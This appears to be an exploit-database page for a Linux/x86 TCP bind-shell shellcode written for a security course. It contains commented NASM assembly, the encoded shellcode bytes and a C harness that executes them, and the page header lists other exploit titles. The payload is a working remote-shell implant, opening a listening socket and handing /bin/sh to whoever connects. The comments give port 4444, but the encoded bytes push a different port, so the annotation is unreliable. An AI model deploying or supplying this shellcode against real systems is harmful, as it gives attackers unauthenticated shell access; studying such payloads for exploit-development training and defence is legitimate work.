
9 changes to exploits/shellcodes Microsoft Edge Chakra - EntrySimpleObjectSlotGetter Type Confusion TAC Xenta 511/911 - Directory Traversal New STAR 2.1 - SQL Injection / Cross-Site Scripting PHP Dashboards NEW 5.5 - 'email' SQL Injection CSV Import & Export 1.1.0 - SQL Injection / Cross-Site Scripting Grid Pro Big Data 1.0 - SQL Injection Linux/x86 - EggHunter + access() Shellcode (38 bytes) Linux/x86 - Bind (4444/TCP) Shell Shellcode (105 bytes) Linux/ARM - Egghunter + /bin/sh Shellcode (32 bytes)
153 lines
No EOL
4.2 KiB
C
153 lines
No EOL
4.2 KiB
C
/*
|
|
; Filename: tcp_bind_shellcode_light.nasm
|
|
; Author: Paolo Perego <paolo@codiceinsicuro.it>
|
|
; Website: https://codiceinsicuro.it
|
|
; Twitter: @thesp0nge
|
|
; SLAE-ID: 1217
|
|
; Purpose: binds on TCP port 4444 and spawn a shell on incoming
|
|
connections.
|
|
|
|
|
|
global _start
|
|
|
|
section .text
|
|
|
|
_start:
|
|
; Creating the socket.
|
|
;
|
|
; int socket(int domain, int type, int protocol);
|
|
;
|
|
; socket() is defined as #define __NR_socket 359 on
|
|
/usr/include/i386-linux-gnu/asm/unistd_32.h
|
|
; AF_INET is defined as 2 in /usr/include/i386-linux-gnu/bits/socket.h
|
|
; SOCK_STREAM is defined as 1 in
|
|
/usr/include/i386-linux-gnu/bits/socket_type.h
|
|
xor eax, eax
|
|
mov ebx, eax
|
|
mov ecx, eax
|
|
mov edx, eax
|
|
|
|
mov ax, 0x167 ; 359 in decimal
|
|
mov bl, 0x2
|
|
mov cl, 0x1
|
|
|
|
int 0x80 ; sfd = socket(AF_INET, SOCK_STREAM, 0);
|
|
mov ebx, eax ; storing the socket descriptor into EBX for next syscall
|
|
|
|
;push eax ; save socket descriptor into the stack
|
|
|
|
; Binding the socket to 0.0.0.0 address at port 4444
|
|
;
|
|
; int bind(int sockfd, const struct sockaddr *addr, socklen_t addrlen);
|
|
;
|
|
;
|
|
; bind() is defined as #define __NR_bind 361 on
|
|
/usr/include/i386-linux-gnu/asm/unistd_32.h
|
|
|
|
xor eax, eax
|
|
mov ax, 0x169 ; 361 in decimal
|
|
xor ecx, ecx
|
|
push ecx ; pushing 32 bit INADDR_ANY
|
|
push word 0x5c11 ; pushing PORT 4444 in network byte order
|
|
push word 0x2 ; pushing AF_INET as sin_family
|
|
|
|
mov ecx, esp ; now ECX points to the my_addr data structure
|
|
mov dl, 0x10 ; sizeof(my_addr) = 16 bytes
|
|
int 0x80 ; bind(sfd, (struct sockaddr *) &my_addr, sizeof(my_addr));
|
|
|
|
; Listening on opened socket bound to port 4444
|
|
;
|
|
; int listen(int sockfd, int backlog);
|
|
;
|
|
; listen() is defined as #define __NR_listen 363 in
|
|
/usr/include/i386-linux-gnu/asm/unistd_32.h
|
|
xor ecx, ecx
|
|
xor eax, eax
|
|
mov ax, 0x16b ; 363 in decimal
|
|
int 0x80 ; listen(sfd, 0);
|
|
|
|
; Accepting incoming connection on listening socket
|
|
;
|
|
; int accept(int sockfd, struct sockaddr *addr, socklen_t *addrlen);
|
|
;
|
|
; accept() is not defined as syscall in
|
|
/usr/include/i386-linux-gnu/asm/unistd_32.h.
|
|
; Instead accept4() is defined as #define __NR_accept4 364.
|
|
;
|
|
; From the man page, accept4() has the followint prototype:
|
|
; int accept4(int sockfd, struct sockaddr *addr, socklen_t *addrlen, int
|
|
flags);
|
|
;
|
|
; The last integer, as from the man page, if set to 0 makes the
|
|
; accept4() call to behave as the same as the accept()
|
|
xor eax, eax
|
|
mov ax, 0x16c ; 364 in decimal
|
|
|
|
push ecx ; ECX is 0, pushing on the stack
|
|
|
|
mov esi, ecx
|
|
mov ecx, esp ; ECX now points to a zero bytes region from the stack.
|
|
mov edx, esp
|
|
|
|
int 0x80 ; cfd = accept4(sfd, NULL, NULL, 0);
|
|
|
|
mov ebx, eax ; Saving socket descript resulting from accept4 into EBX
|
|
|
|
; Duplicating descriptor 0, 1, 2 to the socket opened by client
|
|
;
|
|
; int dup2(int oldfd, int newfd);
|
|
;
|
|
; dup2 is defined as #define __NR_dup2 63 in
|
|
/usr/include/i386-linux-gnu/asm/unistd_32.h
|
|
|
|
xor ecx, ecx
|
|
mov cl, 2
|
|
xor eax, eax
|
|
|
|
dup2:
|
|
mov al, 0x3F ; 63 in decimal
|
|
int 0x80 ; duplicating file descriptors in backwards order; from 2 to 0
|
|
dec ecx
|
|
jns dup2
|
|
|
|
; Executing shell
|
|
;
|
|
; int execve(const char *filename, char *const argv[], char *const envp[]);
|
|
; execve() is defined as #define __NR_execve 11 on
|
|
/usr/include/i386-linux-gnu/asm/unistd_32.h
|
|
|
|
xor eax, eax
|
|
push eax ; The NULL byte
|
|
push 0x68732f2f ; "sh//". The second '\' is used to align our command into
|
|
the stack
|
|
push 0x6e69622f ; "nib/"
|
|
mov ebx, esp ; EBX now points to "/bin//sh"
|
|
xor ecx, ecx
|
|
xor edx, edx
|
|
mov al, 0xB ; 11 in decimal
|
|
int 0x80
|
|
|
|
*/
|
|
#include<stdio.h>
|
|
#include<string.h>
|
|
|
|
unsigned char code[] = \
|
|
|
|
"\x31\xc0\x89\xc3\x89\xc1\x89\xc2\x66\xb8\x67\x01\xb3\x02\xb1\x01\xcd\x80\x89\xc3\x31\xc0\x66\xb8\x69\x01\x31\xc9\x51\x66\x68\x15\xb3\x66\x6a\x02\x89\xe1\xb2\x10\xcd\x80\x31\xc9\x31\xc0\x66\xb8\x6b\x01\xcd\x80\x31\xc0\x66\xb8\x6c\x01\x51\x89\xce\x89\xe1\x89\xe2\xcd\x80\x89\xc3\x31\xc9\xb1\x02\x31\xc0\xb0\x3f\xcd\x80\x49\x79\xf9\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x31\xc9\x31\xd2\xb0\x0b\xcd\x80";
|
|
|
|
|
|
|
|
int main(int argc, char **argv)
|
|
{
|
|
printf("Shellcode Length: %d\n", strlen(code));
|
|
int (*ret)() = (int(*)())code;
|
|
ret();
|
|
}
|
|
|
|
|
|
|
|
--
|
|
$ cd /pub
|
|
$ more beer
|
|
|
|
I pirati della sicurezza applicativa: https://codiceinsicuro.it
|